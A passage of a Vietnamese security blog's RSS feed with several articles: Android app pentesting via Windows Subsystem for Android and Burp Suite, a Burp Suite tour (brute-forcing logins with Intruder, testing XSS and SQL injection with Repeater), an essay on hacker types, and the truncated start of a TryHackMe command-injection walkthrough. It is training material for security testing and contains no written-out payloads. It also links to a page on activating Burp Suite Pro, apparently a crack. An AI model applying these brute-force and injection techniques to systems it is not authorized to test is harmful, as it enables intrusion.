<p>Subsystem Android for Windows 11 được phát triển bởi cùng một công nghệ của Windows Subsystem for Linux. Nhờ khả năng ảo hóa liền mạch được hỗ trợ bởi Hyper-V, WSA nhanh hơn đáng kể so với bất kỳ trình giả lập Android nào khác hiện có. Hơn nữa, bạn có thể tải ứng dụng trên WSA hoặc thậm chí sửa đổi system image cơ bản để <a href="https://anonyviet.com/cach-cai-dat-google-play-store-tren-windows-11-thanh-cong/">cài đặt CH Play</a> và các ứng dụng khác của Google. Tóm lại, sẽ rất hợp lý khi sử dụng Windows Subsystem for Android như một nền tảng kiểm thử ứng dụng di động.</p>
<p>Sau khi cài đặt trình khởi chạy trong WSA, bạn có thể truy cập phần cài đặt mạng của lớp Android. Tiếp theo, bạn có thể cài đặt tổ chức phát hành chứng chỉ và thiết lập proxy tùy chỉnh để chặn lưu lượng truy cập bằng cách sử dụng các công cụ quét lỗ hổng web như <a href="https://anonyviet.com/?s=Burp+suite">Burp suite</a>.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/12/WSA-burp-suite-interception.jpg" alt="Cách Pentest ứng dụng Android trên Windows 11 bằng WSA 6" width="625" height="432" title="Cách Pentest ứng dụng Android trên Windows 11 bằng WSA 34"></p>
<p>Để biết thêm về kiểm thử bảo mật Android bằng WSA, hãy xem bài đăng trên blog của Michael Higgo <a href="https://sensepost.com/blog/2021/android-application-testing-using-windows-11-and-windows-subsystem-for-android/" target="_blank" rel="noopener">tại đây.</a> Cho dù bạn là một nhà nghiên cứu bảo mật chuyên nghiệp hay bạn chỉ đơn giản là muốn tìm hiểu về Windows Subsystem for Android, thì đây vẫn là cách tuyệt vời để tìm hiểu thử nghiệm thâm nhập trên các ứng dụng Android.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>WSA có nhanh hơn các trình giả lập Android khác không?</h3>
<p>Có, WSA nhanh hơn đáng kể so với các trình giả lập Android khác nhờ khả năng ảo hóa liền mạch được hỗ trợ bởi Hyper-V.</p>
<h3>Tôi có thể cài đặt Google Play Store trên WSA được không?</h3>
<p>Có, bạn có thể sửa đổi system image cơ bản của WSA để cài đặt Google Play Store và các ứng dụng khác của Google.</p>
<h3>Tôi có thể sử dụng WSA để kiểm tra bảo mật ứng dụng Android như thế nào?</h3>
<p>Bạn có thể sử dụng WSA kết hợp với các bộ công cụ khai thác thời gian chạy như Objection và các công cụ quét lỗ hổng web như Burp Suite để kiểm tra bảo mật ứng dụng Android.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/cach-pentest-ung-dung-android-tren-windows-11-bang-wsa/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Web Pentest &#8211; Bài 1: Giới thiệu tổng quan về Burp Suite</title>
		<link>https://anonyviet.com/web-pentest-bai-1-gioi-thieu-tong-quan-ve-burp-suite/</link>
					<comments>https://anonyviet.com/web-pentest-bai-1-gioi-thieu-tong-quan-ve-burp-suite/#comments</comments>
		
		<dc:creator><![CDATA[TMQ]]></dc:creator>
		<pubDate>Wed, 01 Dec 2021 01:13:20 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[burp]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[burpsuite]]></category>
		<category><![CDATA[Deface]]></category>
		<category><![CDATA[hack web]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[suite]]></category>
		<category><![CDATA[web pentest]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=27482</guid>

					<description><![CDATA[Hiện nay việc tạo dựng và phát triển một website là điều không hề khó đối với mọi người. Việc tạo ra một trang web có thể giúp ích rất nhiều cho mọi người và đặc biệt hơn là trong thời đại 4.0 hiện nay. Cộng thêm việc đại dịch Covid-19 càng làm cho xu [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Hiện nay việc tạo dựng và phát triển một website là điều không hề khó đối với mọi người. Việc tạo ra một trang web có thể giúp ích rất nhiều cho mọi người và đặc biệt hơn là trong thời đại 4.0 hiện nay. Cộng thêm việc đại dịch Covid-19 càng làm cho xu hướng của chúng ta hướng đến trực tuyến online trên các website. Nhưng bạn đã bao giờ tự hỏi liệu trang web mà mình xây dựng đã có đủ sự an toàn đối với mình cũng như các khách hàng truy cập vào hệ thống chưa? Chuyện gì sẽ xảy ra nếu như có một kẻ xấu tấn công vào Website của mình?</strong></p>
<p>Vì vậy, hôm nay <strong>Anonyviet</strong> sẽ mang đến cho các bạn một series về bảo mật hệ thông Website của bạn. Bạn sẽ được nhập vai vào một kẻ xấu và tự tấn công vào website của mình (Pentest) và từ đó sẽ tìm ra lỗi có trên hệ thống và cách khắc phục nó.</p>
<h2>Tổng Quan Về Phần Mềm Hỗ Trợ Pentest Burpsuite</h2>
<p><strong>Yêu Cầu Cài Đặt : </strong></p>
<ul>
<li>Burp Suite (link download ở đây : <a class="externalLink" href="https://portswigger.net/burp/releases/community/latest" target="_blank" rel="noopener">https://portswigger.net/burp/releases/community/latest</a>)</li>
<li>Tải bản Burp Suite Pro <a href="https://anonyviet.com/huong-dan-active-burp-suite-pro-moi-nhat/">ở đây</a>.</li>
<li>Các bạn tiến hành cài đặt Burp Suite như một phần mềm bình thường, có thể lên Youtube để xem cách cài đặt nhé.</li>
<li>Tạo tài khoản trên: <a class="externalLink" href="https://portswigger.net/web-security" target="_blank" rel="noopener">https://portswigger.net/web-security</a></li>
</ul>
<p><strong>Giới Thiệu Về BurpSuite</strong></p>
<p>Burpsuite hiện tại có rất nhiều phiên bản khác nhau. Mỗi phiên bản đều có tính năng và giao diện khá khác nhau. Ở bài viết này Anonyviet sẽ giới thiệu qua về bản Burpsuite 2021.4.3 này nhé.</p>
<p>Sau khi cài đặt, các bạn mở Burp Suite lên sẽ có giao diện giống bên dưới của mình.</p>
<p><img decoding="async" class="alignnone  size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/a.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 17" width="2000" height="1566" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 45"></p>
<h2>Cách sử dụng Burp Suite</h2>
<p>Ở giao diện Dashboard, sẽ có các thông tin về các Task đang chạy ở trên website cần pentest. EventLog ở phía dưới cho ta thấy các lỗ hổng đã được phát hiện. Các thông tin ở trong khung EventLog khá quan trọng, có nhiều lỗi liên quan đến certificate, lỗi kết nối cũng được hiển thị ở đây. Giúp bạn dễ dàng phát hiện ra và giải quyết nó nhanh hơn.</p>
<p>Kế đến đó chính là phần Target</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/b.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 18" width="2362" height="1850" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 46"></p>
<p>Ở Target, sẽ có thông tin về các site con của website đó được quyền truy cập, các request có thể được thực hiện trên các site này, bạn có thể nhấn nút &gt; ở trong mỗi site, để xem dưới dạng cây, sẽ có cái nhìn trực quan hơn về target.</p>
<p>Cũng ở trong Target, có thể phục vụ việc filter các request nhanh chóng hơn ở trong subtab Scope.</p>
<p>Tiếp đến là giao diện tab Proxy, đây là phần cực kỳ quan trọng trong Burp Suite. Tab HTTP history sẽ lưu lịch sử các request có được trong quá trình thao tác trong thời gian thực ngay trên ứng dụng hoặc Website. Bạn có thể xem trực tiếp các resquest, response và sửa nó.</p>
<p>Từ tab Proxy, bạn có thể chọn một request và gửi request này đến các công cụ khác trong mà Burp Suite hỗ trợ như  Repeater, Intruder, Comparer, &#8230;</p>
<p>Ở phiên bản mới nhất mà mình giới thiệu này, Burpsuite đã tích hợp thêm trình duyệt Chromium, rất thuận tiện và đỡ phải tự cấu hình nó trên các trình duyệt khác.</p>
<p>Để mở Chromium các bạn nhấn vào Open Browser giống hình bên dưới nhé.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/c.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 19" width="1726" height="686" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 47"></p>
<p>&nbsp;</p>
<p>Khi trình duyệt Chromium được khởi chạy, bạn vào một trang web bất kì, <strong>Anonyviet</strong>.Com chẳng hạn, và xem các request được ghi nhận ở trong tab HTTP Proxy. Nếu không thấy thì Intercept của bạn đang off. Click chuột để nó on lên nhé.</p>
<p>Tab kế tiếp đó là Intruder. Được sử dụng nhiều để BruteForce Username, Password, Directory hoặc là test IDOR&#8230;</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/d.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 20" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 48"></p>
<p>&nbsp;</p>
<p>Kế bên tab Intruder, đó chính là Repeater, là thành phần không thể thiếu cho mỗi lần chúng ta pentest. Tại đây, nó cho phép ta có thể chỉnh sửa bất kì thành phần nào của request, từ method, headers, parameters,&#8230; Sau khi chỉnh sửa request xong, bạn nhấn Send để gửi request đến server và nhận phản hồi.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/upload_2021-5-6_13-13-32.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 21" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 49"></p>
<p>&nbsp;</p>
<p>Mình nói đây là thành phần không thể thiếu không phải là nói suông. Là bởi vì việc tấn công một target đòi hỏi chúng ta phải gửi những payload ở nhiều ví trí khác nhau. Bản chất của BurpSuite cũng vậy.</p>
<p>Việc tự thay đổi request như thế này, cho phép chúng ta thử toàn bộ các payload mà chúng ta có, tìm các input được reflect trong response (khi tìm lỗ hổng XSS), hoặc xem kết quả trả về khi chúng ta nhập payload là SQL injection,&#8230;, và để làm những tác vụ đó, Repeater là giải pháp tốt nhất để thực hiện.</p>
<p>Phần này khá quan trọng nên mình sẽ đi vào cụ thể ở các bài tiếp theo. Mọi người nhớ theo dõi nhé.</p>
<p>Tiếp đến là tab Sequencer, được dùng để phân tích độ phức tạp của các thuật toán tạo token trong website. Xem có dễ bị đoán hay không.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/e.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 22" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 50"></p>
<p>&nbsp;</p>
<p>Tiếp đó là Tab Decoder dùng để encode hoặc decode các dạng ký tự như MD5, AES, BASE64&#8230;</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/upload_2021-5-6_13-14-15.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 23" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 51"></p>
<p>&nbsp;</p>
<p>Tab Comparer, dùng để so sánh các request, response khác nhau, do bạn gửi thông qua các tab như proxy tabs hoặc target tab. Bạn có thể gửi bằng cách nhấn chuột phải vào resquest và chọn send to comparer.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/p.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 24" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 52"></p>
<p>&nbsp;</p>
<p>Tab Logger thì giống như cái tên của nó, sẽ lưu lại tất cả các resquest được thực thi trong Burp Suite.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/u.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 25" width="2000" height="1417" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 53"></p>
<p>Tab Extender là tab khá thú vị, nó cho phép bạn thêm mới các extension có sẵn của Burp, hoặc thêm những extension do chính bạn phát triển. Mình sẽ nói kỹ hơn ở các bài tiếp theo.</p>
<p><img decoding="async" class=" size-full aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/v.png" alt="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 26" width="2612" height="1850" title="Web Pentest - Bài 1: Giới thiệu tổng quan về Burp Suite 54"></p>
<p>&nbsp;</p>
<p>Trên đây là một số cơ bản mà bạn phải làm quen trước khi quá trình pentest bắt đầu. Các bạn có thể tự tìm hiểu thêm, sẽ rất có ích với beginner các bạn. Ở những bài tiếp theo chúng ta sẽ tìm hiểu về các kỹ thuật Bruteforce, thu thập thông tin,&#8230; Mong các bạn sẽ đón xem và ủng hộ nhé.</p>
<p><strong>Tổng Hợp Series : </strong></p>
<ul>
<li>Bài 1 : <a href="https://anonyviet.com/web-pentest-bai-…eu-ve-burp-suite/">Giới thiệu tổng quan về BurpSuite</a></li>
</ul>
<p style="text-align: right;"><strong>Chúc các bạn thành công<br />
TMQ.</strong></p>
<h2>Câu hỏi thường gặp</h2>
<h3>Burp Suite là gì và tại sao tôi cần nó cho việc pentest website?</h3>
<p>Burp Suite là một bộ công cụ bảo mật web toàn diện hỗ trợ quá trình pentest (kiểm thử thâm nhập). Nó giúp bạn tìm ra các lỗ hổng bảo mật trong website bằng cách cho phép bạn gửi các request tùy chỉnh, phân tích phản hồi từ server và tự động hóa nhiều tác vụ kiểm tra.</p>
<h3>Tôi có cần phiên bản Pro của Burp Suite không?</h3>
<p>Phiên bản Community của Burp Suite là miễn phí và cung cấp nhiều tính năng hữu ích cho người mới bắt đầu.  Phiên bản Pro có thêm nhiều tính năng nâng cao hơn, nhưng phiên bản Community vẫn đủ tốt để bạn bắt đầu học và thực hành pentest.</p>
<h3>Tôi có thể tìm hiểu thêm về các tính năng của Burp Suite ở đâu?</h3>
<p>Bài viết này đã giới thiệu tổng quan về Burp Suite.  Để tìm hiểu sâu hơn về từng tính năng cụ thể như Intruder, Repeater, hay các tab khác, hãy theo dõi các bài viết tiếp theo trong series của Anonyviet hoặc tham khảo tài liệu chính thức của Burp Suite.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/web-pentest-bai-1-gioi-thieu-tong-quan-ve-burp-suite/feed/</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
		<item>
		<title>Tại sao các công ty lại thuê Hacker về làm việc?</title>
		<link>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/</link>
					<comments>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Mon, 22 Nov 2021 00:29:18 +0000</pubDate>
				<category><![CDATA[Kiến thức]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<category><![CDATA[thuê hacker]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=37196</guid>

					<description><![CDATA[Không phải tất cả Hacker đều là kẻ xấu. Để bảo vệ mạng đúng cách, bạn cần biết loại tấn công mà bạn sẽ phải đối mặt. Vì vậy, việc thuê Hacker sẽ giúp bạn giảm thiểu các tiềm ẩn nguy cơ về bảo mật cho hệ thống. Chính xác thì Hacker là gì? Hacker [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Không phải tất cả Hacker đều là kẻ xấu. Để bảo vệ mạng đúng cách, bạn cần biết loại tấn công mà bạn sẽ phải đối mặt. Vì vậy, việc thuê Hacker sẽ giúp bạn giảm thiểu các tiềm ẩn nguy cơ về bảo mật cho hệ thống.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/11/cyber-security-operations-center.jpg" alt="Tại sao các công ty lại thuê hacker?" width="600" height="338" title="Tại sao các công ty lại thuê Hacker về làm việc? 56"></p>
<h2>Chính xác thì Hacker là gì?</h2>
<p>Hacker là một từ đã được sử dụng lại và nghĩa gốc của nó gần như bị xóa bỏ hoàn toàn. Nó từng có nghĩa là một lập trình viên có năng khiếu, được định hướng. Hacker thực tế bị ám ảnh bởi lập trình, đến mức có thể tách biệt khỏi cuộc sống xã hội bình thường. Họ theo đuổi kiến ​​thức về cách hoạt động bên trong của máy tính, mạng và — trên hết — là phần mềm. Ngoài việc thiếu tương tác xã hội, hacker không được coi là một kẻ xấu.</p>
<p>Với sự phổ biến của CNTT, tội phạm mạng đã trở thành một vấn nạn. Những người có kỹ năng để gây ra các vụ tấn công mạng là hacker, và vì vậy thuật ngữ hacker đã trở nên có ý nghĩa như ngày nay. Nếu bạn yêu cầu ai đó giải thích hacker là gì thì họ sẽ mô tả một người có kiến ​​thức sâu rộng về máy tính, hệ điều hành và lập trình cũng như ý định truy cập vào các hệ thống máy tính.</p>
<p>Nhưng định nghĩa mới về hacker cũng chia hacker thành nhiều loại khác nhau. Có nột số người cố gắng xâm nhập hệ thống mạng là những người tốt và ngược lại. Vậy nên chúng ta có 2 loại hacker:</p>
<ul>
<li><strong>Hacker mũ đen</strong> là những kẻ xấu thực sự. Họ là những kẻ xâm nhập mạng và thực hiện các hành động phạm tội. Họ cố gắng kiếm tiền thông qua các hoạt động bất hợp pháp.</li>
<li><strong>Hacker mũ trắng </strong>thì khác, họ có quyền xâm nhập mạng. Họ được thuê để kiểm tra tính bảo mật của công ty.</li>
</ul>
<p>Tuy nhiên, trong cuộc sống, mọi thứ hiếm khi chỉ có hai màu đen và trắng.</p>
<ul>
<li><strong>Hacker mũ xám</strong> hành xử giống như một tin tặc mũ trắng, nhưng họ không xin phép trước. Họ kiểm tra tính bảo mật của công ty và báo cáo cho doanh nghiệp với hy vọng được trả tiền thưởng. Họ vi phạm pháp luật — hack hệ thống mà không được phép là bất hợp pháp, ngay cả khi công ty biết ơn và trả tiên cho bạn.</li>
<li><strong>Hacker mũ xanh</strong> là người không có kỹ năng, nhưng họ biết cách sử dung các phần mềm tấn công yêu cầu kỹ năng thấp, chẳng hạn như chương trình tấn công DDOS. Họ sử dụng nó để chống lại một doanh nghiệp. Thường là để trả thù như một nhân viên cũ bất mãn có thể sử dụng các chiến thuật như vậy.</li>
<li><strong>Hacker mũ đỏ</strong> là cảnh sát duy nhất trong thế giới hacker. Họ là những tin tặc nhắm mục tiêu vào những tin tặc mũ đen. Giống như mũ xám, mũ đỏ đang sử dụng những phương pháp bất hợp pháp. Giống như Marvel’s Punisher, họ hoạt động bên ngoài luật pháp và không chịu trừng phát, thực hiện thứ công lý mà họ cho là đúng.</li>
<li><strong>Hacker mũ xanh</strong> là một người có tham vọng trở thành một hacker. Họ là những người muốn trở thành mũ đen.</li>
</ul>
<h2>Hacker tội phạm và Hacker chuyên nghiệp</h2>
<p>Tin tặc chuyên nghiệp có thể là những tin tặc có đạo đức (White Hat) khi làm việc, sẵn sàng kiểm tra khả năng phòng thủ của bất kỳ công ty nào và thử độ bảo mật của họ. Họ có thể là những tin tặc làm việc cho các công ty bảo mật lớn hơn, thực hiện cùng một vai trò nhưng làm việc thường xuyên hơn.</p>
<p>Các tổ chức có thể trực tiếp sử dụng các tin tặc của riêng họ. Họ làm việc cùng với các đối tác của mình trong lĩnh vực hỗ trợ CNTT để liên tục thăm dò, kiểm tra và cải thiện an ninh mạng của tổ chức.</p>
<p>Đội đỏ cố gắng tấn công vào tổ chức của chính họ và đội xanh thì ngăn chặn cuộc tấn công đó. Thường thì bạn sẽ cố định ở một đội duy nhất. Nhưng các tổ chức khác thích khuấy động mọi thứ bằng cách di chuyển nhân viên giữa các đội để tấn công lẫn nhau.</p>
<p>Đôi khi các tác nhân đe dọa chuyển sang làm bảo mật chính thống. Những nhân vật trong ngành như Kevin Mitnick &#8211; từng là hacker được truy nã gắt gao nhất thế giới &#8211; điều hành các công ty tư vấn bảo mật của riêng họ.</p>
<p>Các hacker nổi tiếng khác đã được săn tuyển vào các công việc chính thống, chẳng hạn như Peiter Zatko, thành viên một thời của hack Cult of the Dead Cow. Vào tháng 11 năm 2020, ông gia nhập Twitter với tư cách là người đứng đầu bộ phận bảo mật sau các nhiệm kỳ tại Stripe, Google và Cơ quan Nghiên cứu và Dự án Quốc phòng Tiên tiến của Lầu Năm Góc.</p>
<p>Charlie Miller, được biết đến với việc vạch trần các lỗ hổng trong các sản phẩm của Apple và hack hệ thống lái và tăng tốc trên xe Jeep Cherokee, đã làm việc ở các vị trí bảo mật cấp cao tại NSA, Uber và Cruise Automation.</p>
<p>Nhưng cũng có rất nhiều trường hợp mọi người không thể kiếm được việc làm trong lĩnh vực an ninh mạng vì những sai lầm mà họ đã mắc phải trong quá khứ.</p>
<p>Một số tin tặc chuyên nghiệp làm việc cho — và được huấn luyện bởi — các cơ quan tình báo của chính phủ hoặc các đối tác quân sự. Các đội đặc nhiệm do chính phủ phê chuẩn được giao nhiệm vụ thực hiện các hoạt động thu thập thông tin tình báo, phòng thủ và tấn công mạng để đảm bảo an ninh quốc gia và chống khủng bố.</p>
<h2>Hacker khi bị bắt</h2>
<p>Tất cả các quốc gia có năng lực về mặt kỹ thuật đều có các đơn vị tình báo mạng. Họ thu thập, giải mã và phân tích các thông tin tình báo quân sự và phi quân sự về chiến lược, hoạt động và chiến thuật. Họ cung cấp phần mềm giám sát và tấn công thay mặt cho nhà nước tiến hành các nhiệm vụ gián điệp. Họ là những người trong bóng tối, nơi kẻ thù đang cố gắng làm điều tương tự với bạn. Họ muốn thâm nhập vào hệ thống của bạn giống như bạn muốn truy cập vào hệ thống của họ. Các đối tác của bạn đang phát triển các công cụ phần mềm phòng thủ và tấn công, đồng thời cố gắng phát hiện và tận dụng các cuộc tấn công zero-day, giống như bạn.</p>
<p>Shift5 là một công ty khởi nghiệp an ninh mạng được thành lập bởi hai cựu nhân viên Cơ quan An ninh Quốc gia. Họ không chỉ làm việc trong NSA mà còn làm việc trong đơn vị Tailored Access Operations. Đây là một trong những bộ phận bí mật nhất của NSA. Shift5 hứa hẹn cung cấp công nghệ giúp bảo vệ cơ sở hạ tầng quan trọng của Hoa Kỳ. Họ đã công bố một vòng tài trợ trị giá 20 triệu đô la vào tháng 10 năm 2021.</p>
<p>Lực lượng Phòng vệ Israel tương đương với NSA là Đơn vị 8200. Đơn vị 82 hay Đơn vị (Unit) là nhóm tình báo quân sự nổi tiếng của Israel. Các cựu sinh viên của Đơn vị 82, và nhóm bí mật bên trong được gọi là Đơn vị 81, đã thành lập hoặc đồng sáng lập một số công ty công nghệ thành công nhất. <a href="https://www.checkpoint.com/" target="_blank" rel="noopener">Check Point Software</a>, Palo Alto Networks và CyberArk đều có các thành viên sáng lập cũ là Unit. Đây là những công ty thành công được dẫn dắt bởi những bộ não kỹ thuật thông minh nhất.</p>
<p>Các biến chứng nảy sinh khi các cựu nhân viên tình báo Hoa Kỳ được làm việc ở nước ngoài. Hai công dân Hoa Kỳ và một cựu công dân Hoa Kỳ đã gây chú ý gần đây khi có thông tin tiết lộ rằng họ đã làm việc cho nhóm DarkMatter, được thành lập tại Các Tiểu vương quốc Ả Rập Thống nhất. DarkMatter điều hành chương trình giám sát khét tiếng Project Raven cho chính phủ các Tiểu vương quốc.</p>
<p>Vào tháng 9 năm 2021, Marc Baier, Ryan Adams, Daniel Gericke đã tham gia vào một thỏa thuận truy tố hoãn lại hạn chế các hoạt động việc làm trong tương lai và yêu cầu thanh toán chung 1,68 triệu đô la tiền phạt.</p>
<h2>Kỹ năng hấp dẫn trong thị trường còn hạn chế</h2>
<p>Các công ty thuê những cựu tin tặc có kinh nghiệm để phục vụ công ty. Nhưng nếu bạn tham gia vào các hoạt động an ninh mạng cho một cơ quan nhà nước hoặc quân đội, bạn cần hiểu các giới hạn và kiểm soát được bản thân để đảm bảo bạn cung cấp dịch vụ của mình cho các tổ chức và cho các mục đích hợp pháp.</p>
<p>Nếu bạn lo lắng mình trở thành mục tiêu của hacker thì có thể sử dụng các biện pháp<a href="https://anonyviet.com/phuong-phap-bao-mat-giup-an-toan-tren-internet/"> sau đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tại sao các công ty lại thuê hacker?</h3>
<p>Các công ty thuê hacker mũ trắng (ethical hackers) để đánh giá và cải thiện khả năng bảo mật hệ thống của họ.  Những chuyên gia này có kỹ năng thâm nhập hệ thống, giúp phát hiện lỗ hổng bảo mật trước khi tin tặc mũ đen có thể lợi dụng.</p>
<h3>Có những loại hacker nào?</h3>
<p>Có nhiều loại hacker, từ hacker mũ trắng (có đạo đức) làm việc để bảo vệ hệ thống, đến hacker mũ đen (phi đạo đức) thực hiện các hoạt động tấn công bất hợp pháp.  Ngoài ra còn có hacker mũ xám (hoạt động ngoài phạm vi cho phép) và các loại khác với mục đích và phương thức hoạt động khác nhau.</p>
<h3>Liệu việc thuê hacker có an toàn không?</h3>
<p>Việc thuê các hacker mũ trắng từ các công ty bảo mật uy tín là an toàn.  Họ được đào tạo bài bản và có kinh nghiệm trong việc kiểm tra bảo mật mà không gây hại cho hệ thống.  Tuy nhiên, cần lựa chọn kỹ càng để tránh rủi ro.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe: Thử thách OWASP Top 10 Phần 1</title>
		<link>https://anonyviet.com/tryhackme-thu-thach-owasp-top-10-phan-1/</link>
					<comments>https://anonyviet.com/tryhackme-thu-thach-owasp-top-10-phan-1/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Thu, 07 Oct 2021 06:48:37 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[thử thách 14 tỷ]]></category>
		<category><![CDATA[thử thách hack]]></category>
		<category><![CDATA[tryhackme]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=34547</guid>

					<description><![CDATA[Trong bài viết này, chúng ta sẽ khám phá thử thách OWASP Top 10 trên TryHackMe. Qua thử thách này, bạn còn có thể tìm hiểu và khai thác từng lỗ hổng trong số 10 lỗ hổng hàng đầu của OWASP. Đó là 10 rủi ro bảo mật web quan trọng nhất, đọc bài viết này để [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Trong bài viết này, chúng ta sẽ khám phá thử thách <a class="dy ix" href="https://tryhackme.com/room/owasptop10" target="_blank" rel="noopener ugc nofollow">OWASP Top 10</a> trên <a class="dy ix" href="https://tryhackme.com/" target="_blank" rel="noopener ugc nofollow">TryHackMe.</a> Qua thử thách này, bạn còn có thể tìm hiểu và khai thác từng lỗ hổng trong số 10 lỗ hổng hàng đầu của OWASP. Đó là 10 rủi ro bảo mật web quan trọng nhất, đọc <a href="https://anonyviet.com/top-10-lo-hong-bao-mat-web-theo-cong-bo-owasp-2020/">bài viết này</a> để hiểu thêm.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/10/0_2NSPrwCU5nN8bQHP.jpg" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1" width="525" height="317" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 79"></p>
<p>Do thử thách này hơi nhiều nên mình sẽ chia làm 3 phần để bạn tiện theo dõi và cũng đọc cho đỡ chán hơn nhé.</p>
<p>Mình sẽ đi thẳng vào phần thực hành và bỏ qua các kiến thức kỹ thuật. Nếu bạn muốn tìm hiểu kiến thức hay cách hoạt động của lỗ hổng đó thì có thể vào phòng để đọc nha. Và lưu ý, những trang web mình truy cập trong bài viết này là máy chủ ảo của Tryhackme.</p>
<h2>TryHackMe: Thử thách OWASP Top 10 Phần 1</h2>
<h3>Nhiệm vụ 5: [Mức độ nghiêm trọng 1] <strong class="ib da"> Command Injection</strong></h3>
<h4><strong> Active Command Injection là gì?</strong></h4>
<p>Tiêm lệnh mù (Bli<span id="rmm">n</span>d command injection) xảy ra khi lệnh hệ thống được thực hiện cho máy chủ không trả lại phản hồi cho người dùng trong tài liệu HTML. Còn ACI (Active command injection) sẽ trả lại phản hồi cho người dùng. Nó có thể được hiển thị thông qua một số phần tử HTML.</p>
<p>Xem script sau: EvilCorp bắt đầu phát triển trên nền tảng web nhưng đã vô tình tiếp xúc với Internet. Nó chưa hoàn thành nhưng vẫn chứa lỗ hổng chèn lệnh. Nhưng lần này, phản hồi từ lệnh gọi hệ thống có thể được nhìn thấy trên trang web.</p>
<p>Đọc code mẫu từ evilhell.php và xem nó đang làm gì và lý do tại sao nó lại bị ACI. Mình sẽ để code mẫu ở dưới.</p>
<p><strong class="ib da">EvilShell (evilshell.php)</strong></p>
<p><img decoding="async" class="size-full  aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_HKrEjcxvxXttCYTEcFnkhg.png" alt="TryHackMe: Thử thách OWASP Top 10 Phần 1 48" width="370" height="219" title="TryHackMe: Thử thách OWASP Top 10 Phần 1 80"></p>
<p>Phân tích chương trình:</p>
<ol>
<li>Kiểm tra xem tham số<strong> “commandString”</strong> đã được khai báo chưa.</li>
<li>Nếu đúng như vậy, thì biến <strong>$command_string</strong> lấy những gì đã được chuyển vào trường đầu vào.</li>
